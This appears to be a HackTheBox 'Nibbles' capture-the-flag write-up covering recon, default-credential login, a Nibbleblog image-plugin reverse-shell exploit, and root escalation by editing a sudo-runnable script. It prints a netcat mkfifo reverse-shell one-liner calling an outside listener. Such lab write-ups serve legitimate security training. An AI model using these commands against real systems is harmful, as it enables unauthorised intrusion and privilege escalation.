Nibbles HTB Writeup
Hi everyone, this is my writeup for box “Nibbles” found on HackTheBox .
Nudge Section :
→ View the Source Code the main webpage.
→ Try “admin/nibbles” to login into admin dashboard.
→ Use the Image Plugin Exploit to get Reverse Shell.
→ Add code in monitor.sh to get Reverse Shell as root.
IP address of the Machine : 10.10.10.75
Phase 1 : Recon
1. Starting off with an Nmap Scan to get information about the open ports.
nmap -sC -sV -Pn 10.10.10.75
We get the following results from the nmap scan.
We have 2 Ports open :
Port 22 : Running OpenSSH 7.2p2
Port 80 : Running Apache 2.4.18
Part 2 : Enumeration
- Let’s begin our enumeration by visiting the webpage on port 80.
Analyzing the source code of the webpage gives us a interesting endpoint.
Before enumerating further let’s run a gobuster scan on it.
Gobuster scan gives us some interesting endpoints for testing.
The webpage on /nibbleblog looked like this
Now let’s search for exploit of Nibbleblog but sadly we don’t know the version no of Nibbleblog being used, But visiting the endpoint /README we got from gobuster will reveal the version no being used.
Now we have the version no. So, let’s search for it’s exploit. There are several exploits out there But we will use this one :
On going through/trying the exploit we can observe that this exploit is for authenticated users only.
But we don’t have any username-password combination to login. So, I started visiting the endpoints we got from gobuster scan.
On visiting /update.php we can see some interesting endpoints.
Visiting the above endpoints wasn’t much helpful BUT… the endpoint /content/private/users.xml gave us the name of the user i.e. “admin”
Now since we have a username and a login page at /admin.php So, let’s try to log In with some commonly used credentials
After some common guesses like admin/password, admin/admin we can figure out that the combination that works is admin/nibbles.
Part 3 : Getting Reverse Shell
Since we have logged In now we can upload our Reverse Shell in the Image Plugin as mentioned in the exploit above.
After uploading the revere shell, start a NetCat listener and visit the endpoint /nibbleblog/content/private/plugins/my_image/
Annddd…..we got shell. Now let’s make the shell stable by using the commands mentioned below :
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Ctrl+z
stty raw -echo;fg
Part 4: Getting User Flag
We can get the user flag by changing directory to /home/nibbler
Part 5: Getting Root Flag
Now let’s start our journey of privilege escalation by running the command sudo -l.
The script monitor.sh is in zipped folder personal.zip let’s unzip it first.
Observe the permissions of the script in the above screenshot that allows us edit the script. That means we can add our code in monitor.sh and then run it as root. So, let’s append our code and get a reverse shell as root.
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 > /tmp/f”
Anddd…. we have the root flag.
Some more things that I found on the way…..
→ Visit endpoint /nibbleblog/content/private/upload to see some nice pics.
— > Visit endpoint /nibbleblog/content/private/config.xml
Thanks for reading the writeup. I hope you liked it. Any type of feedback or suggestions are appreciated.
You can reach out to me on :
Twitter : https://twitter.com/Viren2737
LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/
